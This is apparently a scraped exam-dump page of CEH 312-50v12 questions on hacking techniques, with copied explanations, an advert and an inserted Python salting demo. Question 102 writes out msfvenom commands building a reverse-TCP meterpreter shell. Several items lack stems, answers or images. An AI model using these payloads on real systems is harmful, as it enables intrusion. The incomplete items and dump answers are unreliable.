By performing a penetration test, you gained access under a user account. During the test, you
established a connection with your own machine via the SMB service and occasionally entered
your login and password in plaintext.
Which file do you have to clean to clear the password?
A. .X session-log
B. .bashrc
C. .profile
D. .bash_history
Answer: (SHOW ANSWER)
NEW QUESTION: 102
What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?
A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe >
shell.exe
D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe >
shell.exe
Answer: (SHOW ANSWER)
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
Often one of the most useful (and, to the beginner, underrated) abilities of Metasploit is the
msfpayload module. Multiple payloads can be created with this module, and it helps create
something that can give you a shell in almost any situation. For each of these payloads you can
go into msfconsole and select exploit/multi/handler. Run 'set payload' for the relevant payload
used and configure all necessary options (LHOST, LPORT, etc.). Execute and wait for the payload
to be run. The examples below are fairly self-explanatory, but LHOST should be filled in with your
IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and
LPORT should be the port you wish to be connected back on.
Example for Windows:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
NEW QUESTION: 103
How can rainbow tables be defeated?
A. Use of non-dictionary words
B. All uppercase character passwords
C. Password salting
D. Lockout accounts under brute force password cracking attempts
Answer: (SHOW ANSWER)
Salt (cryptography) - Wikipedia
A salt is random data that is used as an additional input to a one-way function that hashes data, a
password, or passphrase. Salts are used to safeguard passwords in storage. Historically a
password was stored in plaintext on a system, but over time additional safeguards were
developed to protect a user's password against being read from the system. A salt is one of those
methods.
A new salt is randomly generated for each password. In a typical setting, the salt and the
password (or its version after key stretching) are concatenated and processed with a
cryptographic hash function, and the output hash value (but not the original password) is stored
with the salt in a database. Hashing allows for later authentication without keeping and therefore
risking exposure of the plaintext password in the event that the authentication data store is
compromised.
Salts defend against a pre-computed hash attack, e.g. rainbow tables. Since salts do not have to
be memorized by humans they can make the size of the hash table required for a successful
attack prohibitively large without placing a burden on the users. Since salts are different in each
case, they also protect commonly used passwords, or those users who use the same password
on several sites, by making all salted hash instances for the same password different from each
other.
NEW QUESTION: 104
The ViruXine.W32 virus hides its presence by changing the underlying executable code.
The virus code mutates while keeping the original algorithm intact: the code changes itself each
time it runs, but the function of the code (its semantics) does not change at all.
Here is a section of the Virus code:
What is this technique called?
A. Polymorphic Virus
B. Dravidic Virus
C. Stealth Virus
D. Metamorphic Virus
Answer: (SHOW ANSWER)
NEW QUESTION: 105
Susan, a software developer, wants her web API to update other applications with the latest
information. For this purpose, she uses user-defined HTTP callback or push APIs that are raised
based on trigger events: when invoked, this feature supplies data to other applications so that
users can instantly receive real-time information.
Which of the following techniques is employed by Susan?
A. web shells
B. Webhooks
C. REST API
D. SOAP API
Answer: (SHOW ANSWER)
Webhooks are one of a few ways internet applications will communicate with one another.
It allows you to send real-time data from one application to another whenever a given event
happens.
For example, let's say you've created an application using the Foursquare API that tracks when
people check into your restaurant. You ideally wish to be able to greet customers by name and
provide a complimentary drink when they check in.
What a webhook does is notify you any time someone checks in, so you are able to run any
processes that you have in your application once this event is triggered.
The data is then sent over the web from the application wherever the event originally occurred, to
the receiving application that handles the data.
Here's a visual representation of what that looks like:
A webhook url is provided by the receiving application, and acts as a phone number that the other
application will call once an event happens.
Only it's more complicated than a phone number, because data about the event is sent to the
webhook URL in either JSON or XML format. This is known as the "payload." Here's an example of
what a webhook URL looks like with the payload it's carrying:
What are Webhooks? Webhooks are user-defined HTTP callback or push APIs that are raised
based on events triggered, such as comment received on a post and pushing code to the registry.
A webhook allows an application to update other applications with the latest information. Once
invoked, it supplies data to the other applications, which means that users instantly receive
real-time information. Webhooks are sometimes called "Reverse APIs" as they provide what is
required for API specification, and the developer should create an API to use a webhook. A
webhook is an API concept that is also used to send text messages and notifications to mobile
numbers or email addresses from an application when a specific event is triggered. For instance,
if you search for something in the online store and the required item is out of stock, you click on
the "Notify me" bar to get an alert from the application when that item is available for purchase.
These notifications from the applications are usually sent through webhooks.
NEW QUESTION: 106
Jude, a pen tester working in Keiltech Ltd., performs sophisticated security testing on his
company's network infrastructure to identify security loopholes. In this process, he started to
circumvent the network protection tools and firewalls used in the company. He employed a
technique that can create forged TCP sessions by carrying out multiple SYN, ACK, and RST or
FIN packets. Further, this process allowed Jude to execute DDoS attacks that can exhaust the
network resources. What is the attack technique used by Jude for finding loopholes in the above
scenario?
A. UDP flood attack
B. Peer-to-peer attack
C. Spoofed session flood attack
D. Ping-of-death attack
Answer: (SHOW ANSWER)
Valid 312-50v12 Dumps shared by PassTestKing.com for Helping Passing 312-50v12 Exam!
PassTestKing.com now offer the newest 312-50v12 exam dumps, the PassTestKing.com
312-50v12 exam questions have been updated and answers have been corrected get the
newest PassTestKing.com 312-50v12 dumps with Test Engine here:
https://www.passtestking.com/ECCouncil/312-50v12-practice-exam-dumps.html (505 Q&As
Dumps, 35%OFF Special Discount Code: freecram)
NEW QUESTION: 107
Ethical hacker Jane Doe is attempting to crack the password of the head of the IT department of
ABC company. She is utilizing a rainbow table and notices upon entering a password that extra
characters are added to the password after submitting. What countermeasure is the company
using to protect against rainbow tables?
A. Password key hashing
B. Password salting
C. Password hashing
D. Account lockout
Answer: (SHOW ANSWER)
Passwords are usually described as "hashed and salted". Salting is simply the addition of a
unique, random string of characters known only to the site to every password before it's hashed;
typically this "salt" is placed in front of each password.
The salt value needs to be stored by the site, which means typically sites use the same salt for
each password. This makes it less effective than if individual salts are used.
The use of unique salts means that common passwords shared by multiple users - like "123456"
or "password" - aren't revealed when one such hashed password is known, because
despite the passwords being the same, the salted and hashed values are not.
Large salts also protect against certain methods of attack on hashes, including rainbow tables or
logs of hashed passwords previously broken.
Both hashing and salting may be repeated more than once to increase the difficulty of breaking
the security.
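The salting behaviour described in Questions 103 and 107, as an added example that is not part of the original page: it stores the same passwords unsalted, with one site-wide salt, and with a per-user salt, then checks each scheme against a precomputed hash table. The password list, the user names, the PBKDF2 iteration count and all function names are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets

# Constructed sample data: a tiny list of common passwords (illustrative only).
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein"]
PBKDF2_ITERATIONS = 200_000  # assumption for this example; tune to your hardware


def unsalted_hash(password: str) -> str:
    """Weak scheme: a bare hash, identical for every user with this password."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_precomputed_table(words) -> dict:
    """Stand-in for a rainbow table: hash -> password, built once and reused."""
    return {unsalted_hash(w): w for w in words}


def site_wide_salted_hash(password: str, site_salt: bytes) -> str:
    """One salt shared by all users, placed in front of the password."""
    return hashlib.sha256(site_salt + password.encode()).hexdigest()


def create_record(password: str) -> dict:
    """Hardened scheme: fresh random salt per password plus key stretching."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return {"salt": salt, "iterations": PBKDF2_ITERATIONS, "hash": digest}


def verify(password: str, record: dict) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), record["salt"], record["iterations"]
    )
    return hmac.compare_digest(candidate, record["hash"])


def shared_hash_groups(hashes: dict) -> list:
    """Users whose stored hash is identical, i.e. whose passwords are visibly equal."""
    groups = {}
    for user, value in hashes.items():
        groups.setdefault(value, []).append(user)
    return sorted(sorted(g) for g in groups.values() if len(g) > 1)


def audit(users: dict) -> dict:
    """Store {user: password} under all three schemes and report what leaks."""
    table = build_precomputed_table(COMMON_PASSWORDS)
    site_salt = secrets.token_bytes(16)

    unsalted = {u: unsalted_hash(p) for u, p in users.items()}
    site = {u: site_wide_salted_hash(p, site_salt) for u, p in users.items()}
    per_user = {u: create_record(p)["hash"].hex() for u, p in users.items()}

    def recovered(store):
        # A table lookup succeeds only if the stored value was precomputed.
        return sorted(u for u, h in store.items() if h in table)

    return {
        "unsalted_recovered": recovered(unsalted),
        "site_salt_recovered": recovered(site),
        "site_salt_duplicates": shared_hash_groups(site),
        "per_user_recovered": recovered(per_user),
        "per_user_duplicates": shared_hash_groups(per_user),
    }


if __name__ == "__main__":
    # Constructed users: two share a common password, one has a unique one.
    sample = {"alice": "123456", "bob": "123456", "carol": "Tr0ub4dor&3"}
    for key, value in audit(sample).items():
        print(f"{key}: {value}")
```

A site-wide salt already defeats the generic precomputed table, but identical passwords still produce identical stored values; only the per-user salt removes that signal.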
NEW QUESTION: 108
What is the known plaintext attack used against DES which gives the result that encrypting
plaintext with one DES key followed by encrypting it with a second DES key is no more secure
than using a single key?
A. Man-in-the-middle attack
B. Meet-in-the-middle attack
C. Replay attack
D. Traffic analysis attack
Answer: (SHOW ANSWER)
Meet-in-the-middle attack - Wikipedia
The meet-in-the-middle attack (MITM), a known plaintext attack, is a generic space-time tradeoff
cryptographic attack against encryption schemes that rely on performing multiple encryption
operations in sequence. The MITM attack is the primary reason why Double DES is not used and
why a Triple DES key (168-bit) can be bruteforced by an attacker with 2^56 space and 2^112
operations.
The intruder has to know some parts of plaintext and their ciphertexts. Using meet-in-the-middle
attacks it is possible to break ciphers, which have two or more secret keys for multiple encryption
using the same algorithm. For example, the 3DES cipher works in this way. Meet-in-the-middle
attack was first presented by Diffie and Hellman for cryptanalysis of DES algorithm.
NEW QUESTION: 109
_________ is a tool that can hide processes from the process list, can hide files, registry entries,
and intercept keystrokes.
A. Scanner
B. Backdoor
C. Trojan
D. RootKit
E. DoS tool
Answer: (SHOW ANSWER)
NEW QUESTION: 110
A. Whaling
B. Vishing
C. Spear phishing
D. Phishing
Answer: (SHOW ANSWER)
NEW QUESTION: 111
The following is an entry captured by a network IDS. You are assigned the task of analyzing this
entry. You notice the value 0x90, which is the most common NOOP instruction for the Intel
processor. You figure that the attacker is attempting a buffer overflow attack.
You also notice "/bin/sh" in the ASCII part of the output.
As an analyst what would you conclude about the attack?
A. The attacker is attempting a buffer overflow attack and has succeeded
B. The buffer overflow attack has been neutralized by the IDS
C. The attacker is attempting an exploit that launches a command-line shell
D. The attacker is creating a directory on the compromised machine
Answer: (SHOW ANSWER)
NEW QUESTION: 112
Clark, a professional hacker, was hired by an organization to gather sensitive information about
its competitors surreptitiously. Clark gathers the server IP address of the target organization using
Whois footprinting. Further, he entered the server IP address as an input to an online tool to
retrieve information such as the network range of the target organization and to identify the
network topology and operating system used in the network. What is the online tool employed by
Clark in the above scenario?
A. AOL
B. ARIN
C. DuckDuckGo
D. Baidu
Answer: (SHOW ANSWER)
ARIN Whois/RDAP
ARIN is a nonprofit, member-based organization that administers IP addresses & ASNs in support of the operation and growth of the Internet.
NEW QUESTION: 113
SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass
authentication and allow attackers to access and/or modify data attached to a web application.
Which of the following SQLi types leverages a database server's ability to make DNS requests to
pass data to an attacker?
A. Union-based SQLi
B. Out-of-band SQLi
C. In-band SQLi
D. Time-based blind SQLI
Answer: (SHOW ANSWER)
Out-of-band SQL injection occurs when an attacker is unable to use the same channel to
launch the attack and gather results. Out-of-band SQL injection is not very common, mostly
because it depends on features being enabled on the database server being used by the web
application.
Out-of-band techniques offer an attacker an alternative to inferential time-based techniques,
especially if the server responses are not very stable (making an inferential time-based attack
unreliable).
Out-of-band SQLi techniques would rely on the database server's ability to make DNS or HTTP
requests to deliver data to an attacker. Such is the case with Microsoft SQL Server's xp_dirtree
command, which can be used to make DNS requests to a server an attacker controls; as well as
Oracle Database's UTL_HTTP package, which can be used to send HTTP requests from SQL
and PL/SQL to a server an attacker controls.
NEW QUESTION: 114
A penetration tester is performing the footprinting process and is reviewing publicly available
information about an organization by using the Google search engine.
Which of the following advanced operators would allow the pen tester to restrict the search to the
organization's web domain?
A. [allinurl:]
B. [location:]
C. [site:]
D. [link:]
Answer: (SHOW ANSWER)
Google hacking or Google dorking
https://en.wikipedia.org/wiki/Google_hacking
It is a hacker technique that uses Google Search and other Google applications to find security
holes in the configuration and computer code that websites are using. Google dorking can also be
used for OSINT.
Search syntax
https://en.wikipedia.org/wiki/Google_Search
Google's search engine has its own built-in query language. The following list of queries can be
run to find a list of files, find information about your competition, track people, get information
about SEO backlinks, build email lists, and of course, discover web vulnerabilities.
- [site:] - Search within a specific website
Incorrect answers:
- [allinurl:] - it can be used to fetch results whose URL contains all the specified characters
- [link:] - Search for links to pages
- [location:] - A tricky option.
NEW QUESTION: 115
In this attack, a victim receives an e-mail claiming to be from PayPal stating that their account
has been disabled and confirmation is required before activation. The attackers then run a scam
to collect not one but two credit card numbers, ATM PIN number and other personal details.
Ignorant users usually fall prey to this scam.
Which of the following statements is incorrect related to this attack?
A. Do not send credit card numbers, and personal or financial information via e-mail
B. Do not trust telephone numbers in e-mails or popup ads
C. Do not reply to email messages or popup ads asking for personal or financial information
D. Antivirus, anti-spyware, and firewall software can very easily detect these type of attacks
E. Review credit card and bank account statements regularly
Answer: (SHOW ANSWER)
NEW QUESTION: 116
Firewalls are software or hardware systems that are able to control and monitor the traffic
coming in and out of the target network based on a pre-defined set of rules. Which of the
following types of firewalls can protect against SQL injection attacks?
A. Data-driven firewall
B. Packet firewall
C. Web application firewall
D. Stateful firewall
Answer: (SHOW ANSWER)
Web application firewall - Wikipedia
A web application firewall (WAF) is a specific form of application firewall that filters, monitors, and
blocks HTTP traffic to and from a web service. By inspecting HTTP traffic, it can prevent attacks
exploiting a web application's known vulnerabilities, such as SQL injection, cross-site scripting
(XSS), file inclusion, and improper system configuration.
NEW QUESTION: 117
Larry, a security professional in an organization, has noticed some abnormalities in the user
accounts on a web server. To thwart evolving attacks, he decided to harden the security of the
web server by adopting countermeasures to secure the accounts on the web server.
Which of the following countermeasures must Larry implement to secure the user accounts on the
web server?
A. Retain all unused modules and application extensions
B. Enable unused default user accounts created during the installation of an OS
C. Enable all non-interactive accounts that should exist but do not require interactive login
D. Limit the administrator or root-level access to the minimum number of users
Answer: (SHOW ANSWER)
NEW QUESTION: 118
The establishment of a TCP connection involves a negotiation called three-way handshake. What
type of message does the client send to the server in order to begin this negotiation?
A. ACK
B. RST
C. SYN-ACK
D. SYN
Answer: (SHOW ANSWER)
NEW QUESTION: 119
Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP
cache of these switches.
If these switches' ARP cache is successfully flooded, what will be the result?
A. If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to
attacks.
B. The switches will drop into hub mode if the ARP cache is successfully flooded.
C. Depending on the switch manufacturer, the device will either delete every entry in its ARP
cache or reroute packets to the nearest switch.
D. The switches will route all traffic to the broadcast address created collisions.
Answer: (SHOW ANSWER)
NEW QUESTION: 120
A. A man in the middle attack
B. A sniffing attack
C. A spoofing attack
D. A denial of service attack
Answer: (SHOW ANSWER)
NEW QUESTION: 121
Which of the following is the BEST way to defend against network sniffing?
A. Using encryption protocols to secure network communications
B. Register all machines MAC Address in a Centralized Database
C. Use Static IP Address
D. Restrict Physical Access to Server Rooms hosting Critical Servers
Answer: (SHOW ANSWER)
Sniffing attack - Wikipedia
To prevent networks from sniffing attacks, organizations and individual users should keep away
from applications using insecure protocols, like basic HTTP authentication, File Transfer Protocol
(FTP), and Telnet. Instead, secure protocols such as HTTPS, Secure File Transfer Protocol
(SFTP), and Secure Shell (SSH) should be preferred. In case there is a necessity for using any
insecure protocol in any application, all the data transmission should be encrypted. If required,
VPN (Virtual Private Networks) can be used to provide secure access to users.
NOTE: I want to note that the wording "best option" is valid only for the EC-Council's exam since
the other options will not help against sniffing or will only help from some specific attack vectors.
The sniffing attack surface is huge. To protect against it, you will need to implement a complex of
measures at all levels of abstraction and apply controls at the physical, administrative, and
technical levels. However, encryption is indeed the best option of all, even if your data is
intercepted - an attacker cannot understand it.
NEW QUESTION: 122
There are multiple cloud deployment options depending on how isolated a customer's resources
are from those of other customers. Shared environments share the costs and allow each
customer to enjoy lower operations expenses. One solution is for a customer to join with a group
of users or organizations to share a cloud environment. What is this cloud deployment option
called?
A. Hybrid
B. Community
C. Public
D. Private
Answer: (SHOW ANSWER)
The purpose of this concept is to allow multiple customers to work on joint projects and
applications that belong to the community, where it is necessary to have a centralized cloud
infrastructure. In other words, Community Cloud is a distributed infrastructure that solves the
specific problems of business sectors by integrating the services provided by different types of
cloud solutions.
The communities involved in these projects, such as tenders, business organizations, and research
companies, focus on similar issues in their cloud interactions. Their shared interests may
include concepts and policies related to security and compliance considerations, as well as
the goals of the project.
Community Cloud computing helps its users identify and analyze their business demands
better. A Community Cloud may be hosted in a data center owned by one of the tenants or by a
third-party cloud services provider, and may be either on-site or off-site.
Community Cloud Examples and Use Cases
Cloud providers have developed Community Cloud offerings, and some organizations are already
seeing the benefits. The following list shows some of the main scenarios in which the
Community Cloud model is beneficial to the participating organizations.
Multiple governmental departments that perform transactions with each other can have their
processing systems on shared infrastructure. This setup makes it cost-effective for the tenants,
and may also reduce their data traffic.
Benefits of Community Clouds
Community Cloud provides benefits to organizations within the community, individually as well as
collectively. Organizations don't need to worry about the security concerns linked with Public Cloud
because of the closed user group.
This recent cloud computing model has great potential for businesses seeking cost-effective
cloud services to collaborate on joint projects, because it comes with multiple advantages.
Openness and Impartiality
Community Clouds are open systems, and they remove the dependency organizations have on
cloud service providers. Organizations can achieve many benefits while avoiding the
disadvantages of both public and private clouds.
Flexibility and Scalability
A Community Cloud ensures compatibility among its users, allowing them to modify properties
according to their individual use cases. It also enables companies to interact with their remote
employees and supports the use of different devices, be it a smartphone or a tablet. This makes
this type of cloud solution more flexible to users' demands.
It consists of a community of users and, as such, is scalable in several aspects such as hardware
resources, services, and manpower. It takes demand growth into account, and you only
need to increase the user base.
High Availability and Reliability
Your cloud service must be able to ensure the availability of data and applications at
all times. Community Clouds secure your data in the same way as any other cloud
service, by replicating data and applications in multiple secure locations to protect them from
unforeseen circumstances.
The cloud has redundant infrastructure to make sure data is available whenever and wherever
you need it. High availability and reliability are critical concerns for any type of cloud solution.
Security and Compliance
Two significant concerns discussed when organizations think about cloud computing are data
security and compliance with relevant regulatory authorities. Compromising each other's data
security isn't profitable to anyone in a Community Cloud.
Users can configure various levels of security for their data. Common use cases:
- The ability to block users from editing and downloading specific datasets.
- Making sensitive data subject to strict regulations on who has access to it. Sharing sensitive
data unique to a specific organization would bring harm to all the members involved.
- What devices can store sensitive data.
Convenience and Control
Conflicts related to convenience and control don't arise in a Community Cloud.
Democracy is a crucial factor the Community Cloud offers, as all tenants share and own the
infrastructure and make decisions collaboratively. This setup allows organizations to have
their data closer to them while avoiding the complexities of a private cloud.
Less Work for the IT Department
Having data, applications, and systems in the cloud means you do not need to
manage them entirely. This convenience eliminates the need for tenants to employ extra human
resources to manage the system. Even in a self-managed solution, the work is split among
the participating organizations.
Environment Sustainability
In the Community Cloud, organizations use one platform for all their needs, which dissuades
them from investing in separate cloud facilities. This shift introduces a symbiotic relationship
between broadening and shrinking the utilization of cloud among clients. With the reduction of
organizations using different clouds, resources are used more efficiently, thus resulting in a
smaller carbon footprint.
NEW QUESTION: 123
Which of the following Metasploit post-exploitation modules can be used to escalate privileges on
Windows systems?
A. getsystem
B. getuid
C. keylogrecorder
D. autoroute
Answer: (SHOW ANSWER)
NEW QUESTION: 124
What firewall evasion scanning technique makes use of a zombie system that has low network
activity as well as its fragment identification numbers?
A. Decoy scanning
B. Packet fragmentation scanning
C. Spoof source address scanning
D. Idle scanning
Answer: (SHOW ANSWER)
The idle scan is a TCP port scan technique that consists of sending spoofed packets to a
computer to find out what services are available. This is accomplished by impersonating another
computer whose network traffic is very slow or nonexistent (that is, not transmitting or
receiving information). This could be an idle computer, called a "zombie".
This action can be done through common software network utilities such as nmap and hping. The
attack involves sending forged packets to a specific machine target in an effort to find
distinct characteristics of another zombie machine. The attack is sophisticated because there is
no interaction between the attacker's computer and the target: the attacker interacts only with
the "zombie" computer.
This exploit serves two purposes, as a port scanner and a mapper of trusted IP
relationships between machines. The target system interacts with the "zombie" computer, and
differences in behavior can be observed using different "zombies", with
evidence of different privileges granted by the target to different computers.
The overall intention behind the idle scan is to "check the port status while remaining completely
invisible to the targeted host." The first step in executing an idle scan is to find
an appropriate zombie. It needs to assign IP ID packets incrementally on a global
(rather than per-host it communicates with) basis. It should be idle (hence the scan name), as
extraneous traffic will bump up its IP ID sequence, confusing the scan logic. The lower the
latency between the attacker and the zombie, and between the zombie and the target,
the faster the scan will proceed.
Note that when a port is open, IPIDs increment by 2. The sequence is as follows:
attacker to target -> SYN, target to zombie -> SYN/ACK, zombie to target -> RST (IPID
increment by 1). Now the attacker probes the zombie for the result: attacker to zombie ->
SYN/ACK, zombie to attacker -> RST (IPID increment by 1). So, in this process the IPID
increments by 2 in total.
When an idle scan is attempted, tools (for example nmap) test the proposed zombie and
report any problems with it. If one doesn't work, try another. Enough Internet hosts are
vulnerable that zombie candidates aren't hard to find. A common approach
is to simply execute a ping sweep of some network. Choosing a network near your source
address, or near the target, produces better results. You can try an idle
scan using each available host from the ping sweep results until you find one that
works. As usual, it is best to ask permission before using someone's machines for
unexpected purposes such as idle scanning.
Simple network devices often make great zombies because they are
commonly both underused (idle) and built with simple network stacks that are
vulnerable to IP ID traffic detection.
While identifying a suitable zombie takes some initial work, you can keep re-using
the good ones. Alternatively, there has been some research on utilizing unintended public web
services as zombie hosts to perform similar idle scans. Leveraging the way some of these
services perform outgoing connections upon user submissions can serve as a kind of poor
man's idle scanning.
NEW QUESTION: 125
What type of a vulnerability/attack is it when the malicious person forces the user's browser to
send an authenticated request to a server?
A. Session hijacking
B. Cross-site request forgery
C. Server side request forgery
D. Cross-site scripting
Answer: (SHOW ANSWER)
NEW QUESTION: 126
You need a tool that can do network intrusion prevention and intrusion detection, function as a
network sniffer, and record network activity, what tool would you most likely select?
A. Snort
B. Cain & Abel
C. Nessus
D. Nmap
Answer: (SHOW ANSWER)
NEW QUESTION: 127
Which of the following represents the initial two commands that an IRC client sends to join an IRC
network?
A. USER, PASS
B. LOGIN, USER
C. USER, NICK
D. LOGIN, NICK
Answer: (SHOW ANSWER)
NEW QUESTION: 128
Every company needs a formal written document which spells out to employees precisely what
they are allowed to use the company's systems for, what is prohibited, and what will happen to
them if they break the rules. Two printed copies of the policy should be given to every employee
as soon as possible after they join the organization. The employee should be asked to sign one
copy, which should be safely filed by the company. No one should be allowed to use the
company's computer systems until they have signed the policy in acceptance of its terms.
What is this document called?
A. Information Audit Policy (IAP)
B. Company Compliance Policy (CCP)
C. Information Security Policy (ISP)
D. Penetration Testing Policy (PTP)
Answer: (SHOW ANSWER)
NEW QUESTION: 129
You are the Network Admin, and you get a complaint that some of the websites are no longer
accessible. You try to ping the servers and find them to be reachable. Then you type the IP
address and then you try on the browser, and find it to be accessible. But they are not accessible
when you try using the URL.
What may be the problem?
A. Traffic is Blocked on UDP Port 53
B. Traffic is Blocked on TCP Port 80
C. Traffic is Blocked on TCP Port 54
D. Traffic is Blocked on UDP Port 80
Answer: A
The most likely cause is an issue with DNS.
DNS stands for "Domain Name System." It's a system that lets you connect to websites by
matching human-readable domain names (like example.com) with the server's unique ID where a
website is stored.
Think of the DNS system as the internet's phonebook. It lists domain names with their
corresponding identifiers called IP addresses, instead of listing people's names with their phone
numbers. When a user enters a domain name like wpbeginner.com on their device, it looks up the
IP address and connects them to the physical location where that website is stored.
NOTE: Often DNS lookup information will be cached locally inside the querying computer or
remotely in the DNS infrastructure. There are typically 8 steps in a DNS lookup. When DNS
information is cached, steps are skipped from the DNS lookup process, making it quicker. The
example below outlines all 8 steps when nothing is cached.
The 8 steps in a DNS lookup:
1. A user types 'example.com' into a web browser, and the query travels into the Internet and is
received by a DNS recursive resolver;
2. The resolver then queries a DNS root nameserver;
3. The root server then responds to the resolver with the address of a Top-Level Domain (TLD)
DNS server (such as .com or .net), which stores the information for its domains. When searching
for example.com, our request is pointed toward the .com TLD;
4. The resolver then requests the .com TLD;
5. The TLD server then responds with the IP address of the domain's nameserver, example.com;
6. Lastly, the recursive resolver sends a query to the domain's nameserver;
7. The IP address for example.com is then returned to the resolver from the nameserver;
8. The DNS resolver then responds to the web browser with the IP address of the domain
requested initially.
Once the 8 steps of the DNS lookup have returned the IP address for example.com, the browser
can request the web page:
9. The browser makes an HTTP request to the IP address;
10. The server at that IP returns the webpage to be rendered in the browser.
NOTE 2: DNS primarily uses the User Datagram Protocol (UDP) on port number 53 to serve
requests. If this port is blocked, the lookup already fails at the first step, while the ninth
step (the HTTP request to the IP address) is performed without problems.
NEW QUESTION: 130
A. Harden DNS servers
B. Restrict Zone transfers
C. Use the same machines for DNS and other applications
D. Have subnet diversity between DNS servers
E. Use split-horizon operation for DNS servers
NEW QUESTION: 131
The chance of a hard drive failure is once every three years. The cost to buy a new hard drive is
$300. It will require 10 hours to restore the OS and software to the new hard disk. It will require a
further 4 hours to restore the database from the last backup to the new hard disk. The recovery
person earns $10/hour. Calculate the SLE, ARO, and ALE. Assume the EF = 1 (100%). What is
the closest approximate cost of this replacement and recovery operation per year?
A. $1320
B. $440
C. $100
D. $146
1. AV (Asset Value) = $300 + (14 * $10) = $440: the cost of a hard drive plus the work of the
recovery person, i.e. how much it would take to replace one asset. That is 10 hours for restoring
the OS and software plus 4 hours for the DB restore, multiplied by the hourly rate of the recovery person.
2. SLE (Single Loss Expectancy) = AV * EF (Exposure Factor) = $440 * 1 = $440
3. ARO (Annual Rate of Occurrence) = 1/3 (once every three years, meaning the probability of
occurring during 1 year is 1/3)
4. ALE (Annual Loss Expectancy) = SLE * ARO = 0.33 * $440 = $145.2
NEW QUESTION: 132
Take a look at the following attack on a Web Server using obstructed URL:
How would you protect from these attacks?
A. Configure the Web Server to deny requests involving "hex encoded" characters
B. Create rules in IDS to alert on strange Unicode requests
C. Use SSL authentication on Web Servers
D. Enable Active Scripts Detection at the firewall and routers
NEW QUESTION: 133
You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in
the program exploit.c.
What is the hexadecimal value of the NOP instruction?
A. 0x90
B. 0x60
C. 0x70
D. 0x80
NEW QUESTION: 134
Kevin, an encryption specialist, implemented a technique that enhances the security of keys used
for encryption and authentication. Using this technique, Kevin input an initial key to an algorithm
that generated an enhanced key that is resistant to brute-force attacks. What is the technique
employed by Kevin to improve the security of encryption keys?
A. Key stretching
B. A Public key infrastructure
C. Key reinstallation
D. Key derivation function
Answer: A
NEW QUESTION: 135
Which rootkit is characterized by its function of adding code and/or replacing some of the
operating-system kernel code to obscure a backdoor on a system?
A. Library-level rootkit
B. Hypervisor-level rootkit
C. Kernel-level rootkit
D. User-mode rootkit
NEW QUESTION: 136
Which of the following statements about a zone transfer is correct? (Choose three.)
A. A zone transfer passes all zone information that a DNS server maintains
B. A zone transfer is accomplished with the nslookup service
C. A zone transfer is accomplished with the DNS
D. Zone transfers cannot occur on the Internet
E. A zone transfer passes all zone information that a nslookup server maintains
F. A zone transfer can be prevented by blocking all inbound TCP port 53 connections
NEW QUESTION: 137
Yancey is a network security administrator for a large electric company. This company provides
power for over 100,000 people in Las Vegas. Yancey has worked for his company for over 15
years and has become very successful. One day, Yancey comes in to work and finds out that the
company will be downsizing and he will be out of a job in two weeks. Yancey is very angry and
decides to place logic bombs, viruses, Trojans, and backdoors all over the network to take down
the company once he has left. Yancey does not care if his actions land him in jail for 30 or more
years, he just wants the company to pay for what they are doing to him.
What would Yancey be considered?
A. Because Yancey works for the company currently; he would be a White Hat
B. Yancey would be considered a Suicide Hacker
C. Yancey is a Hacktivist Hacker since he is standing up to a company that is downsizing
D. Since he does not care about going to jail, he would be considered a Black Hat
NEW QUESTION: 138
Elliot is in the process of exploiting a web application that uses SQL as a back-end database.
He's determined that the application is vulnerable to SQL injection, and has introduced
conditional timing delays into injected queries to determine whether they are successful. What
type of SQL injection is Elliot most likely performing?
A. Blind SQL injection
B. Union-based SQL injection
C. NoSQL injection
D. Error-based SQL injection